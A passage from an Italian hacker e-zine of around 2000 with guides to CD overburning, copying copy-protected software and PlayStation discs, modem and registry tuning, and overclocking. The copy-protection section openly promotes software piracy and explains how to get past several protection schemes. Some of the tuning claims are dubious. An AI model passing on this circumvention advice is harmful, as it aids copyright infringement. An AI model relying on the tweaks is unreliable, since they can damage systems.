Di conseguenza, se il mast supporta l'overburn kontinua la kopia altrimenti
segnale all'utente l'impossibilita' di eseguire la skrittura.
Ora la domanda nasce spontanea: io kome kazzo faccio a overmasterizzare?
Innanzitutto, bisogna usare un prog ke sia in grado di gestire questa funzione
proprio kome il nero, e poi avere il masterizzatore,
kome dicevamo prima, in grado di farlo. Ormai una buona parte dei
masterizzatori eskono di serie kon questa funzione, ma non e' detto ke i
meno recenti non lo possano fare: alkune volte basta aggiornare il firmware
-dove possibile- , altre volte bisogna intervenire sull'elettronica del
dispositivo, ma komunque ne varra' la pena :) . Fate un giretto su internet e
troverete tutte le informazioni necessarie
Il primo passo per skrivere un cd overmasterizzato kon il Nero konsiste
nell'abilitare tale funzione. Per default, infatti, tale opzione non e'
abilitata. Allora rechiamoci al menu'
-->file, poi
-->preferenze,
-->caratteristiche avanzate:
qui, naturalmente, faremo clic sulla voce "Attiva la modalita' overburn
utilizzando il metodo disk-at-once".
Subito sotto noteremo lo spazio per inserire la lunghezza max del cd overburn
ke andremo a skrivere: state molto attenti xke' questo e' fondamentale; non
tanto per la korretta skrittura del cd -ke avverra' sikuramente, anke se kon
errori, ma per la successiva lettura nei komuni cd-rom. Puo' succedere ke la
skrittura eska korrettamente, ma poi ci troveremo komunque di fronte ad un cd
illeggibile e quindi inutilizzabile. Dovrete, percio', procedere a tentativi,
soprattutto in base alla marka dei cd-vergini. Ok ? Credo di si.
Kontinuando a leggere sotto lunghezza massima troveremo delle righe ke ci
spiegano le solite kazzate, cioe' ke non tutti i masterizzatori sono
kompatibili o ke potremmo danneggiarli: questo |per fortuna| non e' vero nel
92% dei kasi.
Cioe', o riuscite a overmasterizzare oppure no ;). Gli unici problemi -seri-
potrebbero inkontrarli i possessori di mast modifikati nell'hardware: state
molto attenti a quello ke fate e a kome lo fate, soprattutto siate sikuri ke
la fonte da cui stiate attingendo informazioni su kome modifikare sia
attendibile altrimenti MANDERETE TUTTO A PUTTANE ;).
Ora, poniamo il kaso di dover kopiare un cd di dimensioni superiori ai
fatidici 650 Mb; andiamo alla voce "copia cd" e creiamo -SEMPRE- l'immagine
del cd. In seguito, procediamo kon la skrittura del file immagine e qui il
prog ci porra' una message-box tipo: "Vuoi procedere kon la skrittura di un
cd-overburn e kazzi vari..." Noi, naturalmente, diremo di si e la skrittura
iniziera'. Ora alla storia ci sono 2 finali:

Finale 1) Scrittura eseguita correttamente a "x"
Ok, e' andato tutto bene, il nostro cd funziona… ke kulo ;)

Finale 2) Scrittura fallita a "x"
Kazzo, sono usciti 2000 errori, la skrittura e' fallita… Beh, non tutto e'
perduto: infatti, prima di prendere Komputer, skermo e kose varie e buttarle
dalla finestra proviamo il nostro cd: ci sono ottime possibilita' ke funzioni
korrettamente, nonostante gli errori. Se il cd proprio non funge, ucci cioe',
state kalmi, in fondo e' il primo cd overmasterizzato ke fate Le kause possono
essere diverse: una delle piu' frequenti riguarda quanto skrivevo prima, cioe'
la lunghezza massima: infatti, la dimensione impostata poteva essere molto
pikkola oppure molto grande [esperienza personale]. La kosa ke vi konsiglio e'
quella di provare ankora!!! Lo so ke i cd kostano, pero'...
Naturalmente tutto cio' vale per i cd audio ke dati indistintamente; per
l'audio rikordate sempre di attivare la modalita' di skrittura disk-at-once.


+-----------------------------+
|--2---COPIA DI CD PROTETTI---|
+-----------------------------+

Purtoppo per noi, le kose si mettono sempre peggio. Le software house si sono
skassate i koglioni di vedere i loro prodotti a kompleta disposizione di noi
pikkoli piratucci di software illegale; kosi', si sono impegnate e si
impegnano tutt'ora- a produrre cd kon un elevato indice di protezione
Ma tutto questo non ci fermera' xke' tanto noi troveremo sempre il modo per
fotterli e guadagnare alle loro spalle!!! Siiiii, kome siamo kattivi!
Vediamo adesso di analizzare i vari metodi usati dai bastadacci per proteggere
il software e i rimedi per kopiarli

1) ---Protezione Overburn del cd---

Ehi ma ke siamo deficenti? Bah, dipende Kmq questo e' stato uno dei sistemi
piu' effikaci all'epoka, e per un po' di tempo la misero nel kulo a tutti
fino a quando poi, non si sono trovati i rimedi

---Rimedio---

Ma c'e' bisogno di skriverlo??? Mah allora o overmasterizzate, se ci siete
riusciti ;), e il gioko e' fatto oppure usate i cd da 80 min. [o
overmasterizzate anke su quelli ;))))]

2) ---Protezione TOC illegale---

Questo metodo e' ankora molto popolare nei software: in pratika, questa
protezione viene usata per essere un problema a tutti i prog di
masterizzazione, ke vengono kolpiti kon il fatidico messaggio di errore
durante la kopia del cd.

---Rimedio---

Basta usare un qualsiasi prog oltre al nero ke possa ignorare il TOC illegale
ed il gioko e' fatto. Kosi' si by-passa la protezione, kome se non esistesse

3) ---Protezione File fasulli---

I file fasulli, meglio konosciuti kome "Dummy files", sono dei file di
dimensioni enormi [superiori ai 600 Mb] ke si trovano nella directory del cd
generalmente con estensione AFP.

---Rimedio---

Se il cd e' di dimensioni inferiori ai 659 Mb kopiare il cd kosi' kom'e',
altrimenti overmasterizzare o utilizzare cd da 80min. La kosa importante e'
creare kopie identike all'originale. NON KOPIARE ASSOLUTAMENTE I FILE
SULL'HARD-DISK, XKE' VERRANNO KOPIATI KOSI' KOME C'E' SKRITTO, cioe'600 o +Mb

4) ---Protezione Errori Fisici---

Questo sembra essere il metodo di protezione piu' in voga del momento; infatti,
solo poki lettori o masterizzatori tipo i nuovi waitec [Kome il mio ;)]
possono tranquillamente leggere questi errori volontariamente creati dalle
software house.

---Rimedio---

Utilizzare un buon masterizzatore in grado di by-passare questi errori
Purtroppo, pero', i metodi di protezione non sono finiti; questi 4 ke io ho
elenkato sono i piu' komuni e facilmente risolvibili. Altri cd, pero', hanno
protezioni un po' piu' konsistenti [ma nulla e' impossibile da kopiare…]. Kmq,
nel kaso il vostro masterizzatore non fosse in grado di effettuare alkune
delle operazioni deskritte sopra, vi konsiglio di utilizzare delle apposite
patch, realizzate per permettere la kopia di un determinato software.
Inoltre voglio aggiungere ke il NERO non e' certo il miglior programma per
kopiare i cd protetti [anzi, fa quasi pena]; Purtroppo pero', la maggiorparte
delle persone konoskono questo e quindi...
Se potete, pero', cercate di prokurarvi dei bei programmini tipo BLINDREAD,
PRASSI e ki kapisce kapisce...

+------------------------------------+
|--3---COPIA DI CD PER PLAYSTATION---|
+------------------------------------+

Non riesko a kapire kome mai, ankora, c'e' gente ke non riesce a masterizzare
i cd per la play. Mah o io e Cubix [ueee] siamo troppo svegli, oppure siete
voi ke siete dei K0gli0ni! No, skerzi a parte… molti tipi mi dikono: "sai ho
fatto kosi' ma non esce, ho fatto kosi' ma niente, ecc. ecc" La kosa
fondamentale, sekondo me, e' il supporto, soprattutto in rapporto al vostro
masterizzatore. Voglio dire: se il vostro masterizzatore e' piuttosto vekkio,
tipo 2x o kose simili, e' inutile ke andate a komprare i kazzo di bulk da 1600
lire ke il mast neanke li legge da vuoti, mi sono spiegato? Cio'e, sekondo la
vostra mente, non e' piu' konveniente akquistare dei cd un po' piu' kari, ma
almeno non buttarne via nessuno? Percio', per la play,
-se avete un masterizzatore vekkio-
vi konsilgio di akquistare cd di ottima qualita' tipo Kodak, che sono ORO.
Kon un masterizzatore recente, invece, non dovreste inkontrare grosse
diffikolta'; infatti potete utilizzare benissimo bulk anke a 6x o addirittura
a 8x. Il procedimento kon NERO e' il seguente:

1- Immagine del cd -SEMPRE- quindi "copia al volo" disattivata
2- Nelle "opzioni di lettura" settare -se possibile- :
- ignora TOC di tipo illegale
- In caso di dati illegibili continua la copia
- dati "modo1" e "modo2" forza lettura grezza scrivi senza correggere

Credo di aver detto tutto! Kazzarola sono le 23.16 e devo ankora mangiare Va
beh qualke saluto [ordine sparso, kome al solito]

->Roberta e Maurizio ke skassano sempre ;)
->Cubix e Stefax, uandestescion
->Andrea, vedi di dimagrire
->ddd3d e tedesko, anke se non siamo più kome una volta!!!
->Pikkio e LaraKraft, vi sposerete?

---AsAx---

######################################
#+----------++----------++----------+#
#| hArdWarE || hArdWarE || hArdWarE |#
#+----------++----------++----------+#
######################################

-=!!!|-QuAnd0 iL m0dEm mEtTe lE aLi-|!!!=-
~~(mini guida all'ottimizzazione del modem e della connessione)~~

Autore: The Jackal

Solita solfa...
Io e l'Anarchy in the system (sia come gruppo che come singoli) non ci
assumiamo nessuna responsabilita' per i danni che potrebbero verificarsi
a seguito della lettura di questo articolo.
Se non sapete "metterci le mani sopra", lasciate perdere... li' fuori
ci sono molti programmi (alcuni richiamati anche in questo articolo) che
fanno lo stesso lavoro, ma automaticamente.


> ENTRO (??)

Forse come sistema operativo Windows potra' anche non essere il massimo,
ma, infondo, (IMHO), non e' neanche da buttar via...
Il suo problema principale e' costituito dai settaggi.
Infatti, partendo dalla configurazione di default (notoriamente
instabile) e con un po' di smanettamento, si potra' ottenere un sistema
operativo, se non perfetto, almeno passabile (soprattutto se valutato da
un punto di vista generale).
Dato che Windows, poi, nasce configurato per dare il meglio di se' in
connessioni LAN, capirete bene quanto sia quasi "obbligatorio" mettere
le mani anche sui settaggi del modem.
Preparatevi, quindi, ad avventurarvi fra le tele del registro di
configurazione ed andiamo ad incominciare...
Prenderemo in considerazione un collegamento che avviene tramite linea
telefonica o, per meglio dire, tramite un cavo, costituito da due
connettori di rame, che risponde al nome di "doppino telefonico".
I dati vengono instradati su Internet sotto forma di "pacchetti".
Questi contengono, oltre naturalmente alle informazioni che si vogliono
trasferire, un "header" di 40 bytes recante l'indirizzo di provenienza
del pacchetto, la sua destinazine e la traccia del "routing".
(Per i pochi che ancora non lo sanno, i pacchetti di dati non vengono
spediti o ricevuti con un collegamento diretto fra lo spedente ed il
ricevente, ma vengono instradati attraverso alcuni hosts che prendono
il nome, appunto, di "routers").
C'e' da dire, poi, che i nostri computers, che sono notoriamente dei
grandi analfabeti, riconoscono soltanto informazioni costituite da
numeri in notazione binaria (ovvero informazioni codificate attraverso
una sequenza predefinta di segni zero ed uno) e che queste vengono
trasferite mediante un flusso di dati digitale, espresso in Kbyte per
secondo.
Fin qui tutto lineare... il problema sorge dal fatto che il telefono,
invece, e' stato progettato per la trasmissione della voce sotto forma
di un'onda elettrica, misurabile in Hertz.
Ora, pur non essendo mai stato una cima in matematica, ricordo benissimo,
all'elementari ed alle medie, tutte le serate passate a "tentare di
capire" le trasformazioni matematiche.
E se, al tempo come oggi, non si potevano trasformare i litri in
kilogrammi senza adeguate formule di conversione, anche adesso, per
trasformare il segnale da digitale del Pc ad analogico del telefono, si
ha bisogno di un MODulatore in uscita e di un DEModulatore in entrata...
appunto il MODEM.
In soldoni, anche perche' non saprei spiegarvelo piu' dettagliatamente,
il funzionamento del modem e' abbastanza lineare.
Infatti esso associa ad ogni variazione dell'onda elettrica (piu'
propriamente chiamata "onda portante") una serie di bit... modulando,
cosi', il segnale digitale per renderlo digeribile alla linea telefonica
e demodulandolo nel caso contrario.


> "AT+MS"... (K'hai dettooo???)

Prima di addentrarci all'interno del registro di configurazione, puo'
tornare utile parlare un po' di determinate stringhe di programmazione
che consentono di far eseguire al modem alcune operazioni utili.
Sto parlando dei comandi AT (attention), indispensabili per forzare, ad
esempio, il modem a connettersi ad una determinata velocita' o ad un
determinato numero di telefono.
Il piu' versatile ed importante di questi comandi e' "AT+MS".
La sua stringa di programmazione e' cosi' composta:

AT+MS=<mod.con.>,<automode>,<min.vel.>,<max.vel.>,<codec>,<rbsignaling>,
<max.vel.upload>

Andiamo a spiegare il significato delle sigle paramentro per parametro:

<mod.con.> indica la modalita'
con cui il modem cerchera' di connettersi.
Si tratta quindi di una stringa che ci
permette di utilizzare un protocollo di connessione
specifico. Impostando il valore a 56, forzeremo la
connessione con il protocollo K56flex; impostando,
invece, il valore a 12, otterremo una connesione con
il protocollo V.90
Nei casi in cui vi troviate a navigare su linee
particolarmente disturbate, potrebbe tornare utile
settare il modem con il valore 11. Questo forzera' la
connessione con il protocollo v.34 a 33600 bps.
Una connessione di questo genere potrebbe risultare
piu' performante su linee disturbate perche' non
comporta conversioni di protocollo e perche'
assicura una trasmissione dati continua.

<automode> Se imposteremo il valora ad 1, il modem negoziera' con
il computer remoto la velocita' di connessione ottimale.
Partendo da quella massima, e qualora non riesca a
connettersi, la ridurra' progressivamente fino a
raggiungere un'ampiezza di banda ottimale.
Impostando, invece, il valore a 0 (zero), il modem
si tentera' di connettere solo alla massima velocita'
impostata. Qualora non riesca, o fara' cadere subito la
connessione o non si connettera' proprio.

<min.vel.> indica il limite minimo, in termini di velocita', con
cui il modem si deve connettere. Se nella fase di
transazione con il computer remoto il valora sara'
minore di quello impostato, la connessione non verra'
effettuata.

<max.vel.> indica la massima velocita' alla quale il modem puo'
connettersi. Se la velocita' di connessione sara'
maggiore, il modem si connettera' comunque a quella da
noi specificata.

<codec> e' un valore standard che per l'Europa e' fissato ad 1.

<rbsignaling>E' utilizzato solo dalle linee americane...
impostarlo a 0 (zero).

<max.vel.upload> indica la massima velocita' di trasmissione dati
(upload) permessa al nostro modem.

Questa e' la stringa di configurazione da me consigliata:

AT+MS=12,1,300,50000,1,0,33600

Questa stringa e' ideale per i possessori di un US Robotics (infatti
forza il protocollo V.90)... e solo per loro. La velocita' massima di
connessione impostata e' di 50.000 bps. Penso che una velocita' maggiore
sia possibile solo in casi particolarmente fortunosi... che, quindi,
non prendo in considerazione.
Per tutti gli altri tipi di modem (ma leggete sempre il manuale
allegato), dovrete forzare il protocollo K56flex (valore 56).
Per il resto, i valori sono gli stessi.

Come ho detto poco piu' su', dovete tenere presente che questi parametri
potrebbero non essere universali. Molti modem, infatti, potrebbero non
supportare affatto questi comandi o prevederne altri specifici per il
vostro modello. Il mio consiglio, quindi, e' di leggere PRIMA il manuale
d'istruzioni e POI andare a provare questi comandi.

Infine, la stringa ottimale per chi si connette su linee particolarmente
disturbate e':

AT+MS=11,1,300,33600,1,0,33600

Penso che ormai non abbia bisogno di spiegazioni...


> Nei registri...

Piccola premessa...

Le informazioni che ora andro' a riportare, pur essendo ormai argomento
fisso delle mie sperimentazioni, ab origine, non derivano da un mio
studio sui registri di configurazione, ma da due siti in particolare.
regedit.com e www.wintricks.com sono gli indirizzi web giusti per
chi volesse ottimizzare non solo la connessione, ma tutto il Win 9x.
Fra i due, devo dire che preferisco WinTricks.
Infatti, oltre ad essere completamente in italiano (per chi proprio non
ne vuole sapere d'imparare l'inglese), in materia di settaggi ed
ottimizzazioni e' sempre aggiornatissimo sulle ultime novita' ed e'
ricco di direct-download molto utili.
In poche parole, il mio consiglio e' di visitarlo almeno una volta
alla settimana...
Inoltre, queste ottimizzazioni sono state da me provate su tutti i
Windows che cominciano per 9...
Non avendo, pero', il Windows 98 SE, tocchera' a voi questo compito.

# MTU & MSS

La sigla MTU abbrevia la frase "Maximum Transfer Unit".
Indica, quindi, la massima quantita' di bytes che deve essere instradata
all'interno di ogni pacchetto dati.
Di default Windows setta il valore dell'MTU a 1500 bytes, rendendo ottime
le transazioni all'interno di reti ethernet, ma pessime, o comunque
perfettibili, quelle di tipo telefonico.
Infatti, poiche' 1500 non e' divisibile per 576 (che e' il valore ottimo
per l'MTU), i pacchetti dati vengono frammentati e rispediti piu' volte
di quelle che sarebbero effettivamente necessarie in condizioni ottimali,
rallentando, di conseguenza, la velocita' della vostra connessione.

AVVERTENZA: Prima di operare qualsiasi modifica, fate un backup di tutto
il registro di configurazione ed uno per ogni singola chiave che andrete
a modificare. Prevenire e'meglio che curare!! (pubblicita' occulta??).

Dato che non sono stato capace di scrivere qualcosa di altrettanto
chiaro e schematico, la parte che segue l'ho liberamente ed
arbitrariamente copiata ed incollata dal sito http://regedit.com,
(spero che non mi dicano niente!!)... Il merito di tutto, quindi, e'
solo il loro, io ho soltanto tradotto in italiano.

1. Prima di poter cambiare i settaggi dell'MTU, dovrete trovare le
specifiche del vostro Dial-up Adapter.

2. Cercate la chiave [HKEY_LOCAL_MACHINE\Enum\Root\Net] dove,
all'interno, ci saranno una o piu' sotto-chiavi come 0000,0001 ecc.

3. Aprite ciascuna di queste e trovate quella che, al suo interno,
contiene il valore del 'DeviceDesc' uguale al valore del
'Dialup Adapter'.

4. All'interno di questa, poi, ci sara' un'altra sotto-chiave chiamata
'Bindings'. Apritela e troverete una stringa simile a 'MSTCP\0000'.
Prendete nota dei quattro numeri dopo 'MSTCP' (in questo caso
"0000") ed usateli nel prossimo passo.

5. Andate ora nella chiave [HKEY_LOCAL_MACHINE\Enum\Network\MSTCP] ed
espandete la sotto-chiave che ha gli stessi quattro numeri che vi
siete segnati nel passaggio precedente.

6. In questa chiave troverete un "valore" chiamato 'Driver' che sara'
simile a 'NetTrans\0002'. Prendete nota anche di questi quattro
numeri (nell'esempio "0002") ed usateli nel prossimo passaggio.
Siete pronti per cambiare il valore dell'MTU...

7. Aprite ora la chiave
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans].
Espandete la sotto-chiave che ha gli stessi valori dei quattro
numeri appena segnati.

8. All'interno di questa chiave create una nuova stringa e chiamatela
'MaxMTU'. Datele, poi, il valore di 576 e premete OK.
Create anche un'altra stringa, chiamatela 'MaxMSS' e settate il suo
valore a 536.

9. Uscite dal registro e riavviate la vostra macchina.

NOTA: Sul sito www.wintricks.com ho visto che il valore consigliato
per l'MTU e' di 548 e non di 576 (come appena scritto). Ho provato anche
questo valore, ma ho avuto dei decrementi di prestazioni.
Sicuramente, pero', il fatto e' dovuto al mio caro provider (uno
privato e a pagamento)... a voi, comunque, l'ultima parola.

# RWIN & TTL

RWIN abbrevia la frase "Receive Windows".
Indica il buffer massimo che il Pc deve riempire di dati prima di poter
occuparsi di un'altra transazione TCP.
Il TTL (Time To Live), invece, indica quanto tempo un pacchetto dati
deve rimanere attivo prima che venga scartato. Mi spiego meglio...
In pratica, ogni volta in cui un pacchetto dati viene instradato dallo
spedente attraverso un numero imprecisato di router, il TTL viene
diminuito nel valore. Quando il TTL raggiunge il valore zero, il
pacchetto dati viene scartato ed un errore ICMP viene spedito al Pc
dello spedente affinche' rispedisca il pacchetto.
Capite bene come il valore di default del TTL (32) sia ormai troppo
basso, soprattutto in considerazione della giungla di informazioni che
circola attualmente nella Rete e del numero di router che, normalmente,
un pacchetto "incontra" prima di giungere a destinazione.
Per modificare i due valori, il percorso e' molto piu' breve e semplice
di quello effettuato per l'MTU...
Bene, dopo aver fatto il solito backup di tutto il registro ed averlo
aperto con il comando Esegui--->regedit.exe, andate a posizionarvi
all'interno della chiave

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]

qui, per modificare il valore dell'RWIN, create una nuova stringa
(se esiste gia' modificatela soltanto) chiamandola "DefaultRcvWindows"
(senza gli apici) e settate il valore a 4288.
Per modificare, invece, il valore del TTL, create, sempre nella stessa
chiave del registro, un'altra stringa (se esiste gia' modificatela
soltanto) chiamandola "DefaultTTL" (senza gli apici) e settatela a
64 o 128... provate entrambi (ma uno alla volta!!), il valore ottimale,
infatti, dipende anche dalla vostra linea.
Fatto questo, uscite dal registro e riavviate il tutto.


> Utilz & Progz

Benvenuti nell'angolo del precotto.
Questo angolino l'ho voluto riservare a chi non ha nessuna intenzione
di andarsi a configurare la macchina con le sue manine, preferendo
utilizzare qualche programmino compilato da altri e con un'interfaccia
grafica intuitiva.
Non vi faro', pero', la paternale piu' di tanto; infondo un po' tutti
abbiamo iniziato con i programmi "gia' fatti"... fondamentale, almeno
per come la vedo io, e' la curiosita' di sapere cosa si nasconde dietro
quell'interfaccia grafica e come funziona.
Il resto viene da solo... con il tempo.
Partiamo dai programmi che vi permettono di ottimizzare l'MTU, l'RWIN e
il TTL.
Principalmente mi sento di consigliarvi due titoli. Il primo e'
"Internet Boost"... ottima interfaccia grafica ed estrema facilita' di
utilizzo.
Il secondo e' "Net Lightening". L'ho anche provato per un po' di tempo e
mi e' sembrato piu' completo. Vi permette di fare il backup del registro
di configurazione, di ottimizzare (naturalmente) i valori presi in
considerazione e di aggiungere gli indirizzi IP dei siti che vi
interessano al file degli hosts... evitando, cosi', la ricerca del server
DNS ad ogni connessione.
Altra categoria di programmi utili ad accelerare le nostre operazioni
sulla Rete e' quella dei "Multi Sockets Downloaders".
Questa categoria non ha bisogno di presentazioni. Ormai software come
Getright e Go!zilla la fanno da padroni e sono utilizzati da tutti i
navigatori che abbiano una minima esperienza.
Il funzionamento e' molto semplice, ma, contemporaneamente, geniale.
Invece di aprire una singola "richiesta di download" (socket... tradotto
nella maniera piu' semplice che sono riuscito a pensare) per quel
singolo file, vengono aperti piu' sockets ed ognuno scarica un frammento
del singolo file. Questo, naturalmente, rende il tutto piu' veloce
soprattutto sui siti molto lenti o intasati.
Altra caratteristica importante e' il "Resuming del download".
Questa "utilita'" vi permette di interrompere il download del file per
riprenderlo, poi, in qualsiasi altro momento. Anche diversi giorni
dopo (sempre che il file non venga cancellato direttamente dal server
remoto!! eheheheh!!).
L'ultima categoria che prendero' in considerazione e' quella dei
programmi che si occupano del "Prefetching".
In soldoni, si occupano del download in locale delle pagine (o, piu' in
generale, dei link) a cui potreste accedere dalla pagina web in cui
siete. In questo modo, quando andrete a clikkare per caricare la pagina
successiva, questa sara' gia' presente in locale e, quindi, vi fara'
risparmiare tempo e soldi.
Io non ne ho mai utilizzato uno. Ad ogni modo, dando un'occhiata alle
classifiche dei vari siti che offrono programmi shareware (vedi
shareware.com; download.con; tucows.com; ecc. ecc.), pare che "il piu'
desiderato" di questa categoria di programmi sia "Net Sonic"... a voi,
comunque, la ricerca di quella che piu' vi aggrada.


> ESCO (!!)

Anche questo articolo e' finito...
Per insulti e qualsiasi tipo di lamentela, il mio indirizzo di posta
elettronica e': b_gates@microsoft.com
(non andateci pesanti perche' l'amico e' uno che se la prende
facilmente :^))
Per complimenti e proposte di matrimonio: sciacallo@virgilio.it

---The Jackal---


-=!!!|-0VeRcL0CkInG TuT0RiaL-|!!!=-

Autore: A-s-A-x

Alimenti necessari al sostentamento: 3 sukki di frutta
Musika askoltata: Blink 182 - Enema of the state

___________

1-Perke' overclocking?
2-Nozioni di base
3-Proviamo l'overclock
4-Valori konsigliati di overclock
___________

1-PERKE' OVERCLOCKING?

E' una domanda un po' senza senso... kmq...

1)Sikuramente perke' grazie a tale tecnica possiamo avere un processore piu'
veloce senza spendere money.

2)Sikuramente perke' vogliamo vedere ke succede quando e se un processore si
brucia... =)

3)Sikuramente (per voi) perke' volete sentirvi 'guappi e dire: "Aho' me so
elaborato il komputer"... mah...

Concludendo con le kazzate, passo alle kose serie...

L'overclocking teknikamente konsiste -in breve- nello spingere oltre i valori
dikiarati la frequenza di funzionamento del processore, permettendoci kosi'
di utilizzare un 350 Mhz kome se fosse un 400 Mhz. Kiaro?
__________________

2-NOZIONI DI BASE

Overclokkare una CPU non e' una kosa partikolarmente difficile, tanto ke
potrebbe riuscirci anke un bambino: mio kugino di 9 anni, infatti, ha portato
il suo 133 alla frequenza di 500 Mhz e stranamente il processore non ha
retto... mah... SKERZO :) Allora... per overclokkare una cpu dobbiamo saper
operare su 3 kose fondamentali:

*BUS
*FATTORE DI MOLTIPLICAZIONE
*TENSIONE DELLA CPU

-Il bus, per ki non lo sapesse, e' il "mezzo" attraverso il quale komunikano
tra loro le varie periferike. Variando la kosiddetta "Frequenza di bus"
varia appunto la frequenza kon cui le periferike komunikano. Tale frequenza
si varia settando determinati jumper ke si trovano sulla vostra skeda madre.
Per fare cio' dovrete quindi konsultare il manuale.

-Il fattore di moltiplicazione consiste semplicemente in un numero: proprio
kome si deduce dal suo nome, moltiplicandolo per la frequenza di bus
otterremo la frequenza desiderata della CPU. Ad esempio, se il fattore di
moltiplicazione e' 5 e la freq. di bus e' 100 Mhz avremo 5 x 100 = 500 Mhz.
Credo sia semplice... Anke in questo kaso dobbiamo intervenire sulla skeda
madre per kambiare il valore del fattore di moltiplicazione.

-La tensione della CPU e' ovvia: senza tensione il processore non si accende
e quindi... Il valore di tensione varia da processore a processore e viene
indicato in base alla frequenza di funzionamento. Il suo valore si kambia
sempre attraverso la skeda madre kon appositi jumper, anke se su molte
motherboard intel BX tale tensione non si puo' kambiare attraverso i normali
metodi. Kmq nella tabella qui sotto riporto i valori delle tensioni in base
ai vari tipi di processori:

+----------------------------------------------------+
| CPU CORE I/O |
+----------------------------------------------------+
|INTEL P54C 3.5 3.5 |
|INTEL P55/MMX 2.8 3.3 |
|CYRIX 6X86L 3.5 3.5 |
|CYRIX 6X86Mx 2.9 3.3 |
|AMD K5 3.5 3.5 |
|AMD K6 0.35 3.2 3.3 |
|AMD K6 0.25 2.2 3.3 |
|AMD K6-2 2.2/2.1 3.3 |
|AMD K7 ATHLON (0.25) 1.8/2.0 3.3 |
|PENTIUM II (O.25) 2.0/2.2 3.3 |
|PENTIUM III (O.25) 2.0 3.3 |
|CELERON (MENDOCINO 0.25) 2.0/2.2 3.3 |
+----------------------------------------------------+
________________

3- PROVIAMO L'OVERCLOCK

Poniamo il kaso di avere un bel processore AMD K6-2 350 Mhz e di volerlo
overclokkare: innanzitutto voglio precisare ke spingere oltre i 50 Mhz di
overclock un K6-2 e' pratikamente impossibile -o quasi-. Io stesso ci ho
provato kon risultati negativi... Quindi porteremo il nostro processore alla
frequenza di 400 Mhz, scordatevi le favole, i kastelli, le principesse, i
processori ke diventano 600... :) Per fare cio' operiamo in questo modo:
settiamo -sempre attraverso i jumper presenti sulla skeda madre- la frequenza
del bus a 100 Mhz e il moltiplikatore a 4.0. QUindi 100 x 4 = 400 Mhz... il
gioko e' fatto... quasi... Infatti dobbiamo tenere konto di un fattore
importantissimo anzi, fondamentale: la TEMPERATURA. Con l'innalzamento del
clock di una CPU sale anke la sua temperatura. Dissiparla korrettamente e' di
vitale importanza per l'inkolumità del processore e anke per il nostro
lavoro: una CPU ke skalda e' anke una CPU ke kommette molti errori, fino ad
arrivare al blokko totale del pc. Percio' terremo sempre sotto kontrollo la
temperatura attraverso il bios -se possibile- e procederemo al fine di
ottenere un ottimale smaltimento di temperatura. E' vivamente konsigliabile
l'uso della pasta siliconica tra processore e dissipatore, dato ke komporta
una conduzione del calore superiore a quella dell'aria. Fatto cio' riavvieremo
il picci' e se tutto e' andato bene... la nostra CPU sara' diventata 400 Mhz.
_______________

4- VALORI KONSIGLIATI DI OVERCLOCK

Insieme alla frequenza sono indikati fattore di moltiplicazione e frequenza di
Bus.

+--------------------------------------------------------
+--------------------------------------------------------+
|FREQUENZA OVERCLOCK OVERCLOCK |
|ORIGINALE NORMALE LIMITE |
+--------------------------------------------------------+
+--------------------------------------------------------+
|75 MHZ 90 MHZ 100 MHZ |
| 1.5 X 60 1.5 X 66 |
+--------------------------------------------------------+
|90 MHZ 112 MHZ 120 MHZ |
| 1.5 X 75 1.5 X 83 |
+--------------------------------------------------------+
|100 MHZ 133 MHZ 150 MHZ |
| 2.0 X 66 2.0 X 75 |
+--------------------------------------------------------+
|133 MHZ 166 MHZ 187 MHZ |
| 2.0 X 83 2.5 X 75 |
+--------------------------------------------------------+
|150 MHZ 187 MHZ 210 MHZ |
| 2.5 X 75 2.5 X 83 |
+--------------------------------------------------------+
|166 MHZ MMX 208 MHZ 233 MHZ |
| 2.5 X 83 3.5 X 66 |
+--------------------------------------------------------+
|200 MHZ MMX 225 MHZ 266 MHZ |
| 3.0 X 75 3.5 X 75 |
+--------------------------------------------------------+
|233 MHX MMX & 266 MHZ 292 MHZ |
|PII 233 KLAMATH 3.5 X 75 3.5 X 83 |
+--------------------------------------------------------+
|K6 266 MHZ 292 MHZ 333 MHZ |
| 83 X 3.5 3.5 X 95 |
+--------------------------------------------------------+
|PII 266 MHZ KLAMATH 300 MHZ 350 MHZ |
| 3.0 X 100 3.5 X 100 |
+--------------------------------------------------------+
|K6 300 MHZ 333 MHZ 350 MHZ |
| 3.5 X 95 3.5 X 100 |
+--------------------------------------------------------+
|PII 300 MHZ KLAMATH 333 MHZ 350 MHZ |
| 3.5 X 95 3.5 X 100 |
+--------------------------------------------------------+
|K6-2 333 MHZ 350 MHZ 380 MHZ |
| 3.5 X 100 4.0 X 95 |
+--------------------------------------------------------+
|PII 333 MHZ DESHUETES 400 MHZ 463 MHZ |
| 4.0 X 100 4.0 X 133 |
+--------------------------------------------------------+
|K6-2 350 MHZ 380 MHZ 400 MHZ |
| 4.0 X 95 4.0 X 100 |
+--------------------------------------------------------+
|PII 350 MHZ 392 MHZ 463 MHZ |
| 3.5 X 112 4.0 X 133 |
+--------------------------------------------------------+
|K6-2 400 MHZ 428 MHZ 450 MHZ |
| 4.5 X 95 4.5 X 100 |
+--------------------------------------------------------+
|PII 400 MHZ 448 MHZ 496 MHZ |
| 4.0 X 112 4.0 X 124 |
+--------------------------------------------------------+
|PII 450 MHZ 504 MHZ |
| 4.5 X 112 |
+--------------------------------------------------------+

Aahuuuffffff, ho finito... Ciao Ciao...

---A-s-A-x---



###########################################################################
####### GGGG OOO OOO DDD SSSS TTTTTT U U FFFFFF FFFFFF #######
####### G O O O O D D S TT U U F F #######
####### G GG O O O O D D SSSS TT U U FFF FFF #######
####### G G O O O O D D S S TT U U F F #######
####### GGGG OOO OOO DDD SSSS TT UUUU F F #######
###########################################################################

-=!!!|-tAt0o mAcHiNe-|!!!=-

Autore: dR`sP3nKy

RoKKa CenCia 27-28-29/o3/2ooo

Sa-sal-ve! Oggi son kui per rompervi di nuovo i coyoni !!!

[ applausi ]

Ciao a : JaMMinA [ yuppie sei ritornata!...ci sentiamo stasera ]
Lella [ ti adoro kucciola! ]
zapotecz [ bella bRoDerE! ]
gouranga [ cerka cerka...W le kospirazioni !!! ]
vecna [ away away oggi... ]
]PcrK[ [ bella! ]
lilì, Eva, erGoline,tutto aIS ! [ we', ma riusciremo ad essere tutti
su #aisprod un giorno ? ], Daniele , Marco e Lillo , Bestia , Pippo
e gli Atra [ siete sempre i mejo ].

-x Indice x-

(1) -x Storia.
(2) -x Legge Kontro il Tatoo Oggi.
